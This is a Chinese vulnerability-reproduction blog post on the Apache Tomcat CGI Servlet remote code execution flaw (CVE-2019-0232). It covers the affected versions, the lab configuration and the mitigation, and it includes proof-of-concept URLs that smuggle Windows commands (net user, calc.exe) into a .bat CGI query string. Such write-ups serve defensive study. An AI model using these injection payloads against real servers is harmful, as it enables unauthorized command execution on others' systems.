码迷,mamicode.com
首页 > Web开发 > 详细

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

时间:2021-01-04 11:17:21      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:pps   添加   exe   Servle   用户   lse   更新   style   命令   

漏洞概述:

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对ServletJavaServer PageJSP)的支持。

411日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),由于JRE将命令行参数传递给Windows的方式存在错误,会导致CGI Servlet受到远程执行代码的攻击。

触发该漏洞需要同时满足以下条件:

1. 系统为Windows

2. 启用了CGI Servlet(默认为关闭)

3. 启用了enableCmdLineArgumentsTomcat 9.0.*及官方未来发布版本默认为关闭)

影响范围:

Apache Tomcat 9.0.0.M1 to 9.0.17

Apache Tomcat 8.5.0 to 8.5.39

Apache Tomcat 7.0.0 to 7.0.93

漏洞复现过程:

使用环境:

Windows10\tomcat8.5\jdk1.8\chrome

复现

1、 打开Tomcat安装目录的apache-tomcat-8.5.39\conf\web.xml修改如下配置,在默认情况下配置是注释的。

技术图片

2同时还要修改web.xml以下配置,否则访问cgi目录会提示404

 技术图片

3、 打开Tomcat安装目录的apache-tomcat-8.5.39\conf\context.xml修改如下配置,添加privileged="true"

 技术图片

4、 apache-tomcat-8.5.39\webapps\ROOT\WEB-INF目录新建一个cgi-bin文件夹,创建一个hello.bat的文件,内容如下:

技术图片

 

 

 

漏洞利用:

Poc如下:

http://localhost:8080/cgi-bin/hello.bat?& C%3A%5CWindows%5CSystem32%5Cnet.exe+user

http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

 技术图片

 

 

解决方案:

Apache官方还未正式发布以上最新版本,受影响的用户请保持关注,在官方更新后尽快升级进行防护。与此同时,用户可以将CGI Servlet初始化参数enableCmdLineArguments设置为false来进行防护。

Tomcat安装路径的conf文件夹下,使用编辑器打开web.xml,找到enableCmdLineArguments参数部分,添加如下配置:

 技术图片

重启Tomcat服务,以确保配置生效。

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

标签:pps   添加   exe   Servle   用户   lse   更新   style   命令   

原文地址:https://www.cnblogs.com/coolguo/p/14216136.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!